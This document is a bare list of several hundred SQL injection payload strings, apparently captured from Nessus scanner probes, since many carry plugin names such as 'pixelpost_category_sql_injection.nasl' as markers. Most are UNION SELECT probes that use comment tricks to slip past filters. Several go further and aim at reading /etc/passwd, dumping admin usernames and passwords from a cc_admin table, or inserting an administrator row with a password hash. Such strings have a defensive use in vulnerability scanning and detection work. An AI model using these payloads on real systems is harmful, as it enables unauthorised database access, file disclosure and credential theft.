200607' union select 1,501184215,1,1,1,1,1,1,1,1--
-1/**/union/**/select 1376526276--
'union/**/select/**/0,0,1369222205,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
9999/**/union/**/select/**/1331905182,1,1,1,1,1,1,1--
-99 union select 2020390524,2,880987929,4,5,6,7,8,9,0,1,2,3 --
-1/**/union/**/select 1164366855--
200607' union select 1,1265182078,1,1,1,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332009305',null,null,null,null --
pligg_url_sql_injection.nasl' union select 1331908736,1948616015 -- 
'union/**/select/**/0,0,1647791366,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1/**/union/**/select 412834017--
200607' union select 1,1200541698,1,1,1,1,1,1,1,1--
'/**/union/**/select/**/1,2,1331919224,4--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331918993',null,null,null,null --
200607' union select 1,1192121872,1,1,1,1,1,1,1,1--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904240','5'--
'union/**/select/**/0,0,521532225,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null --
200607' union select 1,1128524552,1,1,1,1,1,1,1,1--
200607' union select 1,1100287420,1,1,1,1,1,1,1,1--
1 union select 1,1331919202
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
-1' union select 0,157871866,0,0,0,0,0--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
-1' union select 0,1323875856,0,0,0,0,0--
'union/**/select/**/0,0,1364632458,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
-1/**/union/**/select/**/0,1,403538393,1441170175,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908835',null,null,null,null --
200607' union select 1,1849014202,1,1,1,1,1,1,1,1--
9999/**/union/**/select/**/1331909370,1,1,1,1,1,1,1--
pligg_url_sql_injection.nasl' union select 1331923203,1242183873 -- 
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
200607' union select 1,1759684664,1,1,1,1,1,1,1,1--
-1' union select 0,1013365063,0,0,0,0,0--
'/**/union/**/select/**/1,2,1331909424,4--
200607' union select 1,674790948,1,1,1,1,1,1,1,1--
-1' union select 0,348320449,0,0,0,0,0--
'union/**/select/**/0,0,763560836,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
'/**/union/**/select/**/1,2,1331909424,4--
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
9999/**/union/**/select/**/1332008332,1,1,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null --
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,512612977),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
-1' union select 0,929714876,0,0,0,0,0--
200607' union select 1,1425852379,1,1,1,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010395',null,null,null,null --
pligg_url_sql_injection.nasl' union select 1332009307,416096840 -- 
' union select 1,1,'1331904667','calendarix_month_sql_injection.nasl',1 
'union select '1','2','pixelpost_category_sql_injection.nasl','1332008334','5'--
pligg_url_sql_injection.nasl' union select 1332009307,416096840 -- 
'union select '1','2','pixelpost_category_sql_injection.nasl','1331919009','5'--
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
' union select 1,1,'1331904225','calendarix_month_sql_injection.nasl',1 
'union/**/select/**/0,0,1431582502,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1 union select 1,1332009307,1854936082 --
-1/**/union/**/select/**/1332009308,1,1510172050--
'/**/union/**/select/**/1,2,1331923205,4--
-1' union select 0,1385926503,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332008329',null,null,null,null --
-1 union select 0,1,2,169866100570,4,5,6,7,8,9,10,11--
-1' union select 0,576895199,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null --
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
-1' union select 0,473248912,0,0,0,0,0--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
-1/**/union/**/select 2080375299--
200607' union select 1,379183911,1,1,1,1,1,1,1,1--
' union select 1,1,'1331904431','calendarix_month_sql_injection.nasl',1 
200607' union select 1,779875714,1,1,1,1,1,1,1,1--
200607' union select 1,744292830,1,1,1,1,1,1,1,1--
pligg_url_sql_injection.nasl' union select 1331908877,462918967 -- 
' union select 1,1,'1332010410','calendarix_month_sql_injection.nasl',1 
'/**/union/**/select/**/1,2,1332008335,4--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010410',null,null,null,null --
'union select '1','2','pixelpost_category_sql_injection.nasl','1331923204','5'--
1 union select 1,1332008331
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
-1 union select 0,1,2,601832871808,4,5,6,7,8,9,10,11--
'/**/union/**/select/**/1,2,1332008335,4--
-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,1131566153),3,4,5,6,7,8,9,10,11,12,13,14,15,16
-99 union select 362784712,2,1572590489,4,5,6,7,8,9,0,1,2,3 --
9999/**/union/**/select/**/1332009306,1,1,1,1,1,1,1--
-1/**/union/**/select 873011444--
'/**/union/**/select/**/1,2,1331908888,4--
-1' union select 0,1005695442,0,0,0,0,0--
-1/**/union/**/select 1606871912--
-1' union select 0,453988391,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908834',null,null,null,null --
-1' union select 0,86738267,0,0,0,0,0--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
-1' union select 0,2033566095,0,0,0,0,0--
'union/**/select/**/0,0,661699354,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1' union select 0,255056503,0,0,0,0,0--
' union select 1,1,'1332008331','calendarix_month_sql_injection.nasl',1 
-1' union select 0,1253662444,0,0,0,0,0--
200607' union select 1,1782293471,1,1,1,1,1,1,1,1--
'/**/union/**/select/**/1,2,1331904464,4--
-99 union select 435389080,2,2084643622,4,5,6,7,8,9,0,1,2,3 --
200607' union select 1,678642094,1,1,1,1,1,1,1,1--
-99 union select 854943738,2,566710091,4,5,6,7,8,9,0,1,2,3 --
-1' union select 0,1704795451,0,0,0,0,0--
200607' union select 1,1284682657,1,1,1,1,1,1,1,1--
-99999/**/union/**/select/**/0,1,concat(1332008331,0x3a,892071098),3,4,5,6,7,8,9,10,11,12,13,14,15,16
pligg_url_sql_injection.nasl' union select 1331923203,1242183873 -- 
-1/**/union/**/select 327415864--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
'/**/union/**/select/**/1,2,1331904463,4--
xx' union/**/  select '1','412596083481','2','comments' /*
'union/**/select/**/0,0,1244365684,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
'/**/union/**/select/**/1,2,1331904463,4--
-1' union select 0,1303050841,0,0,0,0,0--
-9 union select null,null,null,1332009308,4,5
'/**/union/**/select/**/1,2,1332008335,4--
'/**/union/**/select/**/1,2,1331905235,4--
pligg_url_sql_injection.nasl' union select 1331923203,1242183873 -- 
34 union select 692795576
-9 union select null,null,null,1331904243,4,5
-1 union select null,123456,null,null,null,null--
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
-1 union select 1,1332010400,529560500 --
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331905220','5'--
'union/**/select/**/0,0,20217353,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
-1 union select 0,1,2,947023198940,4,5,6,7,8,9,10,11--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331919010','5'--
200607' union select 1,804459550,1,1,1,1,1,1,1,1--
200607' union select 1,450076443,1,1,1,1,1,1,1,1--
'union/**/select/**/0,0,300412621,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-9 union select null,null,null,1331905234,4,5
-1 union select 1,1331904237,89676103 --
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
'union select '1','2','pixelpost_category_sql_injection.nasl','1331908880','5'--
-1' union select 0,1997959680,0,0,0,0,0--
'/**/union/**/select/**/1,2,1331904463,4--
-1/**/union/**/select 469168500--
-1/**/union/**/select 1424302611--
'union select '1','2','pixelpost_category_sql_injection.nasl','1332010414','5'--
'/**/union/**/select/**/1,2,1331904464,4--
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
-1/**/union/**/select/**/0,1,1480204165,1632363387,1,1,1,1,1--
-1 union select 1,1331909396,602648682 --
pligg_url_sql_injection.nasl' union select 1331904238,927121236 -- 
-99999/**/union/**/select/**/0,1,concat(1331905166,0x3a,1536152654),3,4,5,6,7,8,9,10,11,12,13,14,15,16
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
'union/**/select/**/0,0,869732329,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-99 union select 1461801666,2,718923871,4,5,6,7,8,9,0,1,2,3 --
1 union select 1,1332010411
'/**/union/**/select/**/1,2,1331923205,4--
-99999/**/union/**/select/**/0,1,concat(1332008331,0x3a,892071098),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
9999/**/union/**/select/**/1331904231,1,1,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904216',null,null,null,null --
-1' union select 0,963542110,0,0,0,0,0--
1" union all select null,null,11221133,null,null/*
-1' union select 0,1077905216,0,0,0,0,0--
'union/**/select/**/0,0,617137594,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
'/**/union/**/select/**/1,2,1331908741,4--
-99999/**/union/**/select/**/0,1,concat(1332010411,0x3a,1017948332),3,4,5,6,7,8,9,10,11,12,13,14,15,16
200607' union select 1,1576609633,1,1,1,1,1,1,1,1--
'union/**/select/**/0,0,2034425430,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union/**/select/**/0,0,768662659,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
-1' union select 0,595479233,0,0,0,0,0--
-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
1' and 1=0 union/**/ select 'sqlinjection_test
-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332008329',null,null,null,null --
jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331923204','5'--
'/**/union/**/select/**/1,2,1331908741,4--
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
-1/**/union/**/select 99859533--
pligg_url_sql_injection.nasl' union select 1332008334,1061714587 -- 
-99999/**/union/**/select/**/0,1,concat(1332009306,0x3a,1514709258),3,4,5,6,7,8,9,10,11,12,13,14,15,16
-1' union select 0,1200572060,0,0,0,0,0--
-99999/**/union/**/select/**/0,1,concat(1332010411,0x3a,1017948332),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
-9 union select null,null,null,1331908740,4,5
'/**/union/**/select/**/1,2,1331909424,4--
-1' union select 0,708862898,0,0,0,0,0--
-99999/**/union/**/select/**/0,1,concat(1331923200,0x3a,196871378),3,4,5,6,7,8,9,10,11,12,13,14,15,16
'/**/union/**/select/**/1,2,1331904464,4--
-1' union select 0,475189625,0,0,0,0,0--
-1' union select 0,1451427823,0,0,0,0,0--
-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
pligg_url_sql_injection.nasl' union select 1331908877,462918967 -- 
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
'/**/union/**/select/**/1,2,1331904464,4--
' union select 1,1,'1332008330','calendarix_month_sql_injection.nasl',1 
'/**/union/**/select/**/1,2,1332010419,4--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331909312',null,null,null,null --
-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
200607' union select 1,262566063,1,1,1,1,1,1,1,1--
-1' union select 0,478772920,0,0,0,0,0--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331919010','5'--
pligg_url_sql_injection.nasl' union select 1331904238,927121236 -- 
9999/**/union/**/select/**/1331923201,1,1,1,1,1,1,1--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
pligg_url_sql_injection.nasl' union select 1331919216,1114321675 -- 
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331919183',null,null,null,null --
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
'union/**/select/**/0,0,1141767021,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908714',null,null,null,null --
-1' union select 0,49499334,0,0,0,0,0--
-1' union select 0,385193185,0,0,0,0,0--
'union select '1','2','pixelpost_category_sql_injection.nasl','1332008335','5'--
200607' union select 1,1900403573,1,1,1,1,1,1,1,1--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331919219','5'--
' union select 1,1,'1332009306','calendarix_month_sql_injection.nasl',1 
9999/**/union/**/select/**/1331908861,1,1,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332009305',null,null,null,null --
'union/**/select/**/0,0,1645029612,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union select 0,0,0,0,0,0,username,password,0,0,0,0,0,0,0,0,0 from cc_admin/*
-1/**/union/**/select 438328228--
1 union select 1,1331905170
jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--
-1' union select 0,359553433,0,0,0,0,0--
1 union select 1,1331909358
-1' union select 0,122468218,0,0,0,0,0--
pligg_url_sql_injection.nasl' union select 1332010400,256728797 -- 
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010410',null,null,null,null --
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
-1' union select 0,1607725405,0,0,0,0,0--
-99 union select 1075239311,2,231042861,4,5,6,7,8,9,0,1,2,3 --
-1/**/union/**/select/**/1331908740,1,705379658--
'/**/union/**/select/**/1,2,1332010406,4--
pligg_url_sql_injection.nasl' union select 1331905213,113095511 -- 
34 union select 1183395596
xx' union/**/  select '1','412675581480','2','comments' /*
'union/**/select/**/0,0,1161314398,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null --
'/**/union/**/select/**/1,2,1332010406,4--
'union select '1','2','pixelpost_category_sql_injection.nasl','1332009307','5'--
-1/**/union/**/select/**/0,1,2094158887,1430162522,1,1,1,1,1--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331908738','5'--
-1/**/union/**/select 1363072756--
'/**/union/**/select/**/1,2,1331909423,4--
pligg_url_sql_injection.nasl' union select 1331919216,539900350 -- 
200607' union select 1,1927066382,1,1,1,1,1,1,1,1--
-1/**/union/**/select 1928587300--
jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--
-1/**/union/**/select 2125564349--
-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --
'union/**/select/**/0,0,173444095,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1' union select 0,184558504,0,0,0,0,0--
'union/**/select/**/0,0,1260750836,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
200607' union select 1,1423223114,1,1,1,1,1,1,1,1--
pligg_url_sql_injection.nasl' union select 1332010414,1557267964 -- 
'union/**/select/**/0,0,1318083641,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1 union select 0,1,2,003352643884,4,5,6,7,8,9,10,11--
-1' union select 0,830002278,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null --
-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
34 union select 1982082250
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
-1' union select 0,129517196,0,0,0,0,0--
-99 union select 1974863202,2,2009798962,4,5,6,7,8,9,0,1,2,3 --
-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
-1' union select 0,1938145887,0,0,0,0,0--
-1/**/union/**/select 1736489965--
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
34 union select 1255940005
'union select '1','2','pixelpost_category_sql_injection.nasl','1331905219','5'--
'union/**/select/**/0,0,217622241,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/site/' union all select filetoclob('/etc/passwd','server')::html,0 from sysusers where username = user --/.html
' union select 1,1,'1331919195','calendarix_month_sql_injection.nasl',1 
-1/**/union/**/select 1071637599--
'/**/union/**/select/**/1,2,1331904463,4--
pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- 
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
1 union select 1,1331904438
-1 union select 0,1,2,877864692409,4,5,6,7,8,9,10,11--
' union select 1,1,'1331904432','calendarix_month_sql_injection.nasl',1 
'union/**/select/**/0,0,82311197,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union/**/select/**/0,0,1327215788,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1' union select 0,1539349120,0,0,0,0,0--
-1' union select 0,717118813,0,0,0,0,0--
-1' union select 0,2063805552,0,0,0,0,0--
9999/**/union/**/select/**/1331919205,1,1,1,1,1,1,1--
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
-1' union select 0,569418189,0,0,0,0,0--
-1/**/union/**/select/**/1331923205,1,994516176--
-1') union select configval as confighelp from storeadmin where configvar='storeversion' or ('1'='2
'union/**/select/**/0,0,1005650116,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'/**/union/**/select/**/1,2,1331905235,4--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
-1/**/union/**/select 1174127559--
pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- 
-1 union select 0,1,2,077396515632,4,5,6,7,8,9,10,11--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
200607' union select 1,1068432583,1,1,1,1,1,1,1,1--
200607' union select 1,1975764141,1,1,1,1,1,1,1,1--
200607' union select 1,1024298013,1,1,1,1,1,1,1,1--
34 union select 2145271726
1 union select 1,1331919201
-1/**/union/**/select/**/1331904462,1,1641476209--
-1') union select configval as confighelp from storeadmin where configvar='storeversion' or ('1'='2
'union/**/select/**/0,0,579479720,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
9999/**/union/**/select/**/1332010398,1,1,1,1,1,1,1--
-99999/**/union/**/select/**/0,1,concat(1331919000,0x3a,576275653),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
-1/**/union/**/select 920699051--
' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--
-99999/**/union/**/select/**/0,1,concat(1332010397,0x3a,1301577513),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
'/**/union/**/select/**/1,2,1331904464,4--
-9 union select null,null,null,1332010419,4,5
'union/**/select/**/0,0,1037776575,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union/**/select/**/0,0,907033072,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union/**/select/**/0,0,1409137117,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1' union select 0,261058722,0,0,0,0,0--
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
200607' union select 1,898491611,1,1,1,1,1,1,1,1--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332008329',null,null,null,null --
' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--
'union select '1','2','pixelpost_category_sql_injection.nasl','1332010400','5'--
'union/**/select/**/0,0,2115200900,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
pligg_url_sql_injection.nasl' union select 1331919216,539900350 -- 
'union/**/select/**/0,0,1673700990,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
9999/**/union/**/select/**/1331919003,1,1,1,1,1,1,1--
200607' union select 1,199642765,1,1,1,1,1,1,1,1--
-1 union select 1,1331919214,1014126559 --
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904240','5'--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
-1/**/union/**/select/**/0,1,1990709357,1464629176,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331919183',null,null,null,null --
-1' union select 0,1630321351,0,0,0,0,0--
' union select 1,1,'1331922100','calendarix_month_sql_injection.nasl',1 
34 union select 634727808
'union/**/select/**/0,0,1975243928,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
200607' union select 1,1520713154,1,1,1,1,1,1,1,1--
-1/**/union/**/select/**/1331919223,1,1246967071--
2pp'/**/union/**/select/**/'412666083482'/*
-1' union select 0,6982,0,0,0,0,0--
pligg_url_sql_injection.nasl' union select 1332009307,416096840 -- 
-1/**/union/**/select 603119521--
'union/**/select/**/0,0,1700684154,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
200607' union select 1,194160379,1,1,1,1,1,1,1,1--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331909407','5'--
-1 union select 0,1,2,590047445150,4,5,6,7,8,9,10,11--
pligg_url_sql_injection.nasl' union select 1331919008,1645922045 -- 
-99 union select 911180970,2,397451365,4,5,6,7,8,9,0,1,2,3 --
'union select '1','2','pixelpost_category_sql_injection.nasl','1331919219','5'--
'union select '1','2','pixelpost_category_sql_injection.nasl','1332010414','5'--
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
200607' union select 1,1043097911,1,1,1,1,1,1,1,1--
'union/**/select/**/0,0,941052546,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16
' union select 1,1,'1331922013','calendarix_month_sql_injection.nasl',1 
'union select '1','2','pixelpost_category_sql_injection.nasl','1331908881','5'--
'union/**/select/**/0,0,999630768,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
200607' union select 1,237660662,1,1,1,1,1,1,1,1--
pligg_url_sql_injection.nasl' union select 1331923203,1242183873 -- 
'union/**/select/**/0,0,559725146,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
-1' union select 0,1658544285,0,0,0,0,0--
-99999/**/union/**/select/**/0,1,concat(1332010397,0x3a,1301577513),3,4,5,6,7,8,9,10,11,12,13,14,15,16
200607' union select 1,1563821747,1,1,1,1,1,1,1,1--
' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--
200607' union select 1,888296880,1,1,1,1,1,1,1,1--
-1/**/union/**/select/**/0,1,421684559,1012165790,1,1,1,1,1--
'/**/union/**/select/**/1,2,1331908887,4--
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
-1/**/union/**/select 1743271420--
200607' union select 1,1739511784,1,1,1,1,1,1,1,1--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
200607' union select 1,684890398,1,1,1,1,1,1,1,1--
1 union select 1,1331908729
'/**/union/**/select/**/1,2,1331919012,4--
-1/**/union/**/select/**/1331908886,1,1435248681--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331918993',null,null,null,null --
-1 union select 0,1,2,989017141953,4,5,6,7,8,9,10,11--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null --
'union/**/select/**/0,0,1398183016,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1/**/union/**/select/**/1332010419,1,722986200--
34 union select 419061143
34 union select 1574505941
'/**/union/**/select/**/1,2,1331908888,4--
-1/**/union/**/select/**/0,1,776831339,588291065,1,1,1,1,1--
'/**/union/**/select/**/1,2,1331904244,4--
-1 union select 0,1,2,522571337321,4,5,6,7,8,9,10,11--
'union select '1','2','pixelpost_category_sql_injection.nasl','1332008335','5'--
200607' union select 1,2111767763,1,1,1,1,1,1,1,1--
200607' union select 1,596298457,1,1,1,1,1,1,1,1--
'union/**/select/**/0,0,281177442,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-99999/**/union/**/select/**/0,1,concat(1331908854,0x3a,1781864537),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
200607' union select 1,856108099,1,1,1,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904419',null,null,null,null --
' union select 1,1,'1331918998','calendarix_month_sql_injection.nasl',1 
-9 union select null,null,null,1332010406,4,5
'union/**/select/**/0,0,553136338,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
pligg_url_sql_injection.nasl' union select 1331919008,1645922045 -- 
'/**/union/**/select/**/1,2,1331923205,4--
'union select '1','2','pixelpost_category_sql_injection.nasl','1332010414','5'--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331905219','5'--
pligg_url_sql_injection.nasl' union select 1331908877,462918967 -- 
-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,512612977),3,4,5,6,7,8,9,10,11,12,13,14,15,16
200607' union select 1,2098983739,1,1,1,1,1,1,1,1--
'/**/union/**/select/**/1,2,1331919224,4--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null --
'union/**/select/**/0,0,1317538123,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1 union select 0,1,2,526188729179,4,5,6,7,8,9,10,11--
-1/**/union/**/select/**/1331904462,1,1434187354--
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
-1/**/union/**/select/**/1331919011,1,921952561--
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
200607' union select 1,1990910236,1,1,1,1,1,1,1,1--
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
-9 union select null,null,null,1331904462,4,5
-1' union select 0,337036838,0,0,0,0,0--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
200607' union select 1,760917547,1,1,1,1,1,1,1,1--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
'union/**/select/**/0,0,1511087781,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
pligg_url_sql_injection.nasl' union select 1331905213,113095511 -- 
34 union select 1215611548
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
-9 union select null,null,null,1332008335,4,5
